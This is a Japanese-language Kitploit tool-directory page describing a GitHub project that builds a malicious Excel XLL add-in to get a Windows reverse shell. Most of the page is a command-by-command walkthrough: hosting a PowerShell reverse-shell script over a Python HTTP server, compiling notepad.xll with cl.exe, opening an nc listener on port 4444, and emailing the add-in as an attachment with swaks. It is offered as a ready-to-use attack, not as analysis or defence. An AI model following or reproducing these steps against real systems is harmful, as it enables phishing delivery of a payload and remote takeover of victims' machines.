Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/h3x0v3rl0rd/xll_windows_reverse_shell
フィッシングツールエクスプロイトコマンド&コントロールソーシャルエンジニアリングレッドチーミングペイロード開発リモートアクセストロイの木馬
GitHubh3x0v3rl0rd/xll_windows_reverse_shell

xll_windows_reverse_shell

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

xll Windows リバースシェル

リポジトリを見る
151年前未レビュー

xll_windows_reverse_shell

xll Windowsリバースシェル

攻撃者(Kali)マシンで:

root@kitploit:~
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
  1. revsh.ps1 を更新します
  2. Python HTTPサーバーを作成します
root@kitploit:~
python3 -m http.server 9999

攻撃者(Windows)マシンで:

  1. notpadXLL.c をWindows攻撃者マシンに移動し、notpadXLL.c を適宜更新します。
  2. x64 Native Tools Command Prompt for VS 2022 を開きます
  3. 以下のコマンドを実行して notepad.xll を生成します
root@kitploit:~
cl.exe /LD notepadXLL.c /link /out:notepad.xll

image

  1. この notepad.xll をKaliマシンに移動します

Kaliマシンで

  1. swaks をダウンロードします
root@kitploit:~
 curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
  1. ncリスナーを設定します
root@kitploit:~
nc -nlvp 4444
  1. swaks を使用して、notepad.xll を添付したメールを送信します:
root@kitploit:~
./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll

image

ツールをダウンロード